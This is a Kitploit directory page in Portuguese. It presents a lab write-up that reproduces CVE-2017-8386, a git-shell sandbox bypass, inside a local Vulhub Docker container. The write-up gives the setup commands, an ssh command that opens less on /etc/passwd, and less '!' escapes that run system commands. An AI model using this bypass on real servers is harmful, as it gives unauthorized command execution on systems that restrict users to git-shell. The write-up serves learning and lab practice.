Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
WHS3_vulhub — PoC para a vulnerabilidade de bypass do sandbox do Git-Shell CVE-2017-8386. | Kitploit
Ferramentas/GitHubGitHub/suz1n/whs3_vulhub
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubsuz1n/whs3_vulhub

WHS3_vulhub

PoC para a vulnerabilidade de bypass do sandbox do Git-Shell CVE-2017-8386.

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2017-8386: git-shell Sandbox Bypass to RCE PoC

정수진(@suz1n)

Visão Geral

O Git-shell fornece um ambiente que permite apenas comandos git restritos via SSH. No entanto, em certas versões do git-shell (como 2.12.2), existe uma vulnerabilidade (CVE-2017-8386) que permite abusar do comando less para contornar a sandbox e executar comandos do sistema.

Este relatório realiza um PoC para esta vulnerabilidade e resume o processo.

Configuração do Ambiente

Ferramentas e Versões Utilizadas

  • Docker: 24.0.7
  • Docker-Compose: v2.34.0
  • Host OS: macOS
  • Target OS: Ubuntu 16.04 (dentro do contêiner)
  • Git Version: 2.12.2
  • SSH Server

Clonando o Repositório Vulhub

git clone https://github.com/phith0n/vulhub.git

cd vulhub/git/CVE-2017-8386/ Image1

Configuração do docker-compose.yml e Dockerfile

root@kitploit:~
• Imagem base Ubuntu 16.04
• Instalação do Git 2.12.2 a partir do código fonte
• Instalação e execução do servidor OpenSSH
• Configuração do ambiente git-shell (criação do usuário git)

Construindo e Executando o Contêiner

docker-compose build

docker-compose up -d

docker ps

root@kitploit:~
• Verificar execução do contêiner (git-shell-cve-2017-8386)

Image2

Registro de Chave SSH e Configuração do Ambiente

root@kitploit:~
1. Gerar e copiar id_rsa.pub localmente
2. Acessar o contêiner e mudar para o usuário git
3. Registrar authorized_keys

docker exec -it git-shell-cve-2017-8386 /bin/bash

chsh -s /bin/bash git

su git

mkdir -p ~/.ssh

chmod 700 ~/.ssh

touch ~/.ssh/authorized_keys

chmod 600 ~/.ssh/authorized_keys

vim ~/.ssh/authorized_keys

Image3

Instalação de Pacotes Adicionais

apt update

apt install less -y

apt install man-db -y

root@kitploit:~
• Instalação dos pacotes less e man concluída para execução do PoC

Processo do PoC

Acesso SSH Normal

ssh -p 3322 -i id_rsa -t [email protected] "less /etc/passwd"

• Entrada na tela less bem-sucedida

• Possibilidade de executar comandos do sistema através do comando !

Execução de Comandos (Contorno da Sandbox)

• !id -> Exibe ID do usuário, ID do grupo first_execute.png

• !whoami -> Usuário atual (git)

• !uname -a -> Exibe informações do kernel do sistema

• !ls /home/git -> Lista arquivos do diretório home do git

Análise

root@kitploit:~
• O ambiente git-shell restringe o usuário de executar comandos do sistema.
• No entanto, é possível invocar o less internamente através do comando `git-upload-archive --help`.
• O comando less suporta a execução de comandos de shell do sistema através da funcionalidade !.
• Consequentemente, é possível contornar a sandbox do git-shell e executar comandos arbitrários.

Referências

• Insinuator 블로그: https://insinuator.net/2017/05/git-shell-bypass-by-abusing-less-cve-2017-8386/

• Vulhub GitHub Repository: https://github.com/phith0n/vulhub

Link do Repositório GitHub

https://github.com/suz1n/WHS3_vulhub

Baixar ferramenta